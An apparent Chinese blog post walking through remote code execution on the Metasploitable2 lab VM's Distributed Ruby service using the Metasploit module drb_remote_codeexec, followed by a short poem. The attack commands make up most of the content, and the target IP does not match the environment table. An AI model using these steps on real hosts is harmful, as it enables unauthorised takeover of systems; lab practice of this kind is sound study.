您当前的位置: 首页 >  ruby

Metasploitable2靶机之第十一篇--Druby远程代码执行漏洞

发布时间:2021-04-03 12:13:10 ,浏览量:8

文章目录

      • 环境
      • 漏洞利用
          • 第一步 ,启动MSF
          • 第二步选择漏洞库
          • 第三步 设置参数,开始攻击
          • 第四步 利用成功,
      • 摘抄

环境

主机 地址
Metasploitable2 192.168.232.202
kali-linux 192.168.232.129

漏洞利用

第一步 ,启动MSF
msfconsole

第二步选择漏洞库
search drb
use  exploit/linux/misc/drb_remote_codeexec

第三步 设置参数,开始攻击
show options
Set rhosats 192.168.160.131 设置要攻击的IP
exploit

第四步 利用成功,

摘抄

刺骨寒冬,有皑皑白雪,

有漫漫水墨一样,巍峨挺拔的山峰,

也有即将迎来的万物逢春

关注
打赏
查看更多评论

暂无认证

  • 8浏览

    0关注

    115983博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文
立即登录/注册

微信扫码登录